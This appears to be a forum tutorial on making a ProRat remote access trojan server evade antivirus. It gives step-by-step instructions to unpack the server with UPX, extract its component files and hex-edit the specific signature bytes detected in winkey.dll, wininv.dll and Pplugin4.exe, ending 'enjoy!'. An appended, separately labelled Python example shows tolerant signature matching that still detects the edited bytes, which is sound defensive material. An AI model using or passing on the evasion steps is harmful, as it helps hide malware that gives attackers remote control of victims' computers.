RedJoker

Rapidshare Toolz Collection


The required programs to complete this task.

1) ProRat Server. Found at: http://www.prorat.net.

2) UPX Packer/Unpacker. Found at: http://upx.sf.net

3) Hex Editor. (Hex Workshop recommended).

4) Fearless BFE

So let's start.

1) First simply create your Server via ProRat client with the settings which you choose.

2) Unpack the server. Go to Command Prompt and run upx.exe from there. After that's accomplished, unpack the server.exe by writing in "upx -d server.exe". To repack it later on at the end, simply write "upx -9 server.exe".

3) AVs have a selected piece of code within the server which tells whether it is a dangerous object or not.

This part is the most important.

a) First let's stop it from being recognized. ProRat 1.9's most recognized piece of code is C4C0535657. To help you find it more easily, search for this longer piece of code.

8D09005F5E5B8BE55DC39090558BEC83C4C0535657

Now our code is

8D09005F5E5B8BE55DC39090558BEC83C4C0535657

we will change this to

8D09005F5E5B8BE55DC39090558BEC83C4C0535647 (this will be detected by now but just an example).

To make our server completely undetected, we will need to edit winkey.dll and wininv.dll.

How can we do this? ProRat is found in 3 different pieces: winkey.dll, wininv.dll and Pplugin4.exe.

To extract these files you will need Fearless BFE.

b) For stopping the AVs from recognizing this part of code we must do the same thing.

our code is

winkey.dll:

0321450C837D0C007411A14C30001085C07408575653FFD0

we will change this to

0321450C837D0C007411A14C30001085C07408575653FF47

c) For stopping this part of the code being detected we must change the code once more.

our code is

wininv.dll:

837D0C007411A15C31001085C07408575653FF

we will change this to

837D0C007411A15C31001085C0740857565347

d) One last time.

our code is

Pplugin4.exe:

6472712E696E6900637279707465642D70617373776F726400 0000000000

we will change it to

6472712E696E6900637279707465642D70617373776F726400 0000000047

Now we are undetected. Repack the file and enjoy!
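Added example, not part of the original post: seen from the detection side, the one-byte edit in step a) only defeats a signature that is compared byte for byte. The Python code below matches the post's 21-byte pattern with a small Hamming-distance tolerance, so the edited variant is still flagged; the function names and sample buffers are constructed for illustration and do not reflect any vendor's engine.

```python
# Added example: exact vs. tolerant byte-signature matching.
# Hex values are the ones quoted in the post; everything else is constructed.
ORIGINAL_SIG = bytes.fromhex("8D09005F5E5B8BE55DC39090558BEC83C4C0535657")
EDITED_SIG = bytes.fromhex("8D09005F5E5B8BE55DC39090558BEC83C4C0535647")


def fuzzy_match(data: bytes, sig: bytes, max_mismatches: int = 1):
    """Return (offset, mismatches) for the first window of `data` that
    differs from `sig` in at most `max_mismatches` bytes, else None."""
    n = len(sig)
    for off in range(len(data) - n + 1):
        mismatches = 0
        for a, b in zip(data[off:off + n], sig):
            if a != b:
                mismatches += 1
                if mismatches > max_mismatches:
                    break  # too different, try the next window
        else:
            return off, mismatches
    return None


def classify(data: bytes, sig: bytes = ORIGINAL_SIG, max_mismatches: int = 1) -> str:
    """Label a buffer as 'exact', 'variant' (near match) or 'clean'."""
    if sig in data:
        return "exact"
    if fuzzy_match(data, sig, max_mismatches) is not None:
        return "variant"
    return "clean"


# Constructed sample buffers: 32 bytes of padding around each pattern.
PAD = bytes(32)
SAMPLE_ORIGINAL = PAD + ORIGINAL_SIG + PAD
SAMPLE_EDITED = PAD + EDITED_SIG + PAD
SAMPLE_CLEAN = bytes(96)

if __name__ == "__main__":
    for name, buf in [("original", SAMPLE_ORIGINAL),
                      ("edited", SAMPLE_EDITED),
                      ("clean", SAMPLE_CLEAN)]:
        print(name, classify(buf), fuzzy_match(buf, ORIGINAL_SIG))
```

A mismatch tolerance raises the false-positive rate, so short patterns like this one are normally combined with further conditions such as additional patterns elsewhere in the file or behavioural indicators.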
